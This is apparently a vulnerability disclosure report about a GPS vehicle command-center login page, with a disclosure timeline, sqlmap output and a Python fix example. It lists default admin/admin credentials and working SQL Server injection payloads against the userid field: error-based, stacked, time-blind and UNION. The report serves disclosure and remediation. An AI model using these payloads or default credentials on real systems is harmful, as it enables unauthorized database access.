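2015-03-13: Details reported to the vendor; awaiting vendor handling
2015-03-13: Vendor confirmed; details disclosed to the vendor only
2015-03-23: Details disclosed to core white hats and experts in related fields
2015-04-02: Details disclosed to regular white hats
2015-04-12: Details disclosed to intern white hats
2015-04-27: Details disclosed to the public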
As in the title.
*****command center GPS vehicle^*****
1. http://**.**.**/login.htm
admin/admin; the login form also has a POST injection.
sqlmap identified the following injection points with a total of 310 HTTP(s) requests:
---
Parameter: userid (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: userid=asd' AND 4457=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4457=4457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rBNt'='rBNt&password=asd&I1.x=14&I1.y=14

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: userid=asd';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: userid=asd' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14

    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: userid=asd' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(103)+CHAR(83)+CHAR(69)+CHAR(71)+CHAR(121)+CHAR(121)+CHAR(119)+CHAR(65)+CHAR(75)+CHAR(109)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=asd&I1.x=14&I1.y=14
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
Change the password and filter the relevant characters.
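An added example, not part of the original report: the string-built login query that makes the `userid` POST field injectable, next to the parameter-bound form that removes the injection without depending on a character filter. It assumes an in-memory sqlite3 database as a stand-in for SQL Server 2000; the table, function names and input values are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the login table (sqlite3, not SQL Server 2000).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('operator', 'constructed-pw')")
    return conn

def login_concat(conn, userid, password):
    # Vulnerable pattern: the POST fields become part of the SQL text.
    sql = ("SELECT userid FROM users WHERE userid = '%s' AND password = '%s'"
           % (userid, password))
    return conn.execute(sql).fetchall()

def login_param(conn, userid, password):
    # Hardened pattern: the driver binds the fields as data, never as SQL.
    sql = "SELECT userid FROM users WHERE userid = ? AND password = ?"
    return conn.execute(sql, (userid, password)).fetchall()

def attempt(fn, userid, password):
    # Run one login against a fresh database; report SQL errors by class name.
    try:
        return fn(make_db(), userid, password)
    except sqlite3.Error as exc:
        return "sql error: " + type(exc).__name__

def compare(userid, password="asd"):
    return {"concat": attempt(login_concat, userid, password),
            "param": attempt(login_param, userid, password)}

# Constructed inputs. UNION_SHAPED has the shape of the UNION payload in the
# sqlmap output: a quote ends the literal, UNION adds a row, "--" drops the rest.
UNION_SHAPED = "asd' UNION ALL SELECT 'row-from-injected-select'-- "
QUOTED_NAME = "o'brien"  # legitimate-looking value that contains a quote

if __name__ == "__main__":
    print(compare("operator", "constructed-pw"))  # both paths find the user
    print(compare(UNION_SHAPED))  # concat returns a row, param returns none
    print(compare(QUOTED_NAME))   # concat breaks the statement, param is fine
```

The SQL error raised by the concatenated query on a stray quote is the same signal the error-based technique in the sqlmap output relies on, so returning database errors to the client should be disabled as well.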
Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-03-13 15:25
Verified that the described issue exists; they have been notified to fix it.
None yet